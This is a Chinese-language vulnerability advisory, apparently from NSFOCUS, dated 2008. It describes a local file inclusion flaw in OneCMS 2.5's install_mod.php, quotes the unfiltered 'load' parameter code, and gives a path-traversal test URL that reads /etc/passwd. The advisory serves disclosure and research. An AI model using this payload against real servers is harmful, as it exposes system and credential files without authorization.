安全研究

安全漏洞
OneCMS load参数本地文件包含漏洞

发布日期:2008-05-26
更新日期:2008-05-27

受影响系统:
insanevisions OneCMS 2.5
描述:
BUGTRAQ  ID: 29374

OneCMS是为网络游戏站点设计的内容管理系统。

OneCMS实现上存在输入验证漏洞,远程攻击者可以通过提交恶意的HTTP请求包含本地资源的任意文件,导致泄露敏感信息。

当act设置为go的时候,OneCMS的install_mod.php文件中没有正确过滤对load参数的输入便用于包含文件:

$mod = $_GET['load'];
$filexp = explode(".", $mod);
$filetype = $filexp[1];
$file = $filexp[0];
$file2 = "mods/$mod";

if (!is_numeric($mod)) { // makes sure that the user isnt entering a #
if ($filetype == "php") {
if ($_GET['act'] == "") {
echo "Are you sure you would like to install the <b>".$file."</b> module?<br><a href='install_mod.php?load=".$mod."&act=go'>Yes</a>";
}
if ($_GET['act'] == "go") {
include ($file2);
...



<*来源:Digital Security Research Group
  
  链接:http://secunia.com/advisories/30378/
        http://milw0rm.com/exploits/5669
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[server]/[installdir]/install_mod.php?act=go&load=1234.php../../../../../../../../../../../../../etc/passwd

建议:
厂商补丁:

insanevisions
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sourceforge.net/project/showfiles.php?group_id=148948

浏览次数:2356
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障